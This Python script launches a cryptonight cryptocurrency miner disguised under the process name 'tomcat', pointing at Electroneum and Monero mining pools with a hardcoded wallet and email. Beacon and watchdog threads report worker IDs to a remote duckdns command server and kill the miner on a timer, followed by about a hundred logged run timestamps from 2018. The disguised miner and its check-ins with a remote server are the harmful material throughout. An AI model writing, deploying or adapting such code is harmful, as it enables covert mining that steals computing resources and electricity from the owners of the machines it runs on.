import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:11:04.626801
#2018-02-17 15:58:06.793635
#2018-02-17 17:46:07.388424
#2018-02-17 19:35:05.891551
#2018-02-17 21:25:05.162430
#2018-02-17 23:09:07.664987
#2018-02-18 00:56:07.496449
#2018-02-18 02:44:07.225769
#2018-02-18 04:33:03.575523
#2018-02-18 06:24:04.941498
#2018-02-18 08:12:07.711070
#2018-02-18 09:59:04.307841
#2018-02-18 11:46:07.875196
#2018-02-18 13:30:08.150222
#2018-02-18 15:20:05.141605
#2018-02-18 17:09:04.142891
#2018-02-18 18:56:06.561248
#2018-02-18 20:43:04.663552
#2018-02-18 22:27:06.401986
#2018-02-19 00:16:06.031591
#2018-02-19 02:02:05.367022
#2018-02-19 03:49:02.067106
#2018-02-19 05:34:04.513919
#2018-02-19 07:22:03.226855
#2018-02-19 09:12:05.099409
#2018-02-19 11:02:08.707966
#2018-02-19 12:50:10.825079
#2018-02-19 14:38:08.968449
#2018-02-19 16:26:06.533447
#2018-02-19 18:12:01.551278
#2018-02-19 19:59:05.514191
#2018-02-19 21:49:01.661089
#2018-02-19 23:34:05.707636
#2018-02-20 01:19:07.188577
#2018-02-20 03:09:07.788067
#2018-02-20 04:57:04.662630
#2018-02-20 06:39:07.090269
#2018-02-20 08:24:07.922300
#2018-02-20 10:10:03.197660
#2018-02-20 11:54:13.077556
#2018-02-20 13:43:01.901045
#2018-02-20 15:28:10.015854
#2018-02-20 17:13:01.633728
#2018-02-20 19:02:08.908104
#2018-02-20 20:51:02.197567
#2018-02-20 22:35:06.183977
#2018-02-21 00:18:06.112905
#2018-02-21 02:04:06.169679
#2018-02-21 03:53:02.207383
#2018-02-21 05:40:06.820613
#2018-02-21 07:28:05.123665
#2018-02-21 09:13:01.352691
#2018-02-21 11:02:08.119004
#2018-02-21 12:48:04.304517
#2018-02-21 14:36:06.780389
#2018-02-21 16:22:04.067345
#2018-02-21 18:13:02.028283
#2018-02-21 19:59:07.126133
#2018-02-21 21:47:06.068578
#2018-02-21 23:43:02.116586
#2018-02-22 01:32:05.724256
#2018-02-22 03:21:08.221114
#2018-02-22 05:08:04.305631
#2018-02-22 06:52:04.124665
#2018-02-22 08:40:08.681548
#2018-02-22 10:27:03.940477
#2018-02-22 12:12:06.731915
#2018-02-22 13:58:01.720003
#2018-02-22 15:45:11.002031
#2018-02-22 17:31:08.818246
#2018-02-22 19:19:05.746751
#2018-02-22 21:12:04.512501
#2018-02-22 22:58:04.179260
#2018-02-23 00:47:01.512386
#2018-02-23 02:36:01.892714
#2018-02-23 04:23:05.627860
#2018-02-23 06:10:10.568059
#2018-02-23 07:57:05.373693
#2018-02-23 10:15:09.476750
#2018-02-23 12:09:06.441401
#2018-02-23 13:57:06.696756
#2018-02-23 15:54:09.301706
#2018-02-23 17:41:08.520702
#2018-02-23 19:28:07.787686
#2018-02-23 21:13:02.079229
#2018-02-23 22:58:03.964838
#2018-02-24 00:45:08.006636
#2018-02-24 02:39:04.028965
#2018-02-24 04:33:05.703852
#2018-02-24 06:18:05.191168
#2018-02-24 08:06:05.639429
#2018-02-24 09:50:06.330328
#2018-02-24 11:45:04.992801
#2018-02-24 13:36:01.676073
#2018-02-24 15:24:07.680859
#2018-02-24 17:14:06.233447
#2018-02-24 19:05:06.957942
#2018-02-24 20:53:01.434636
#2018-02-24 23:13:05.929841
#2018-02-25 03:22:06.817409
#2018-02-25 06:52:03.387753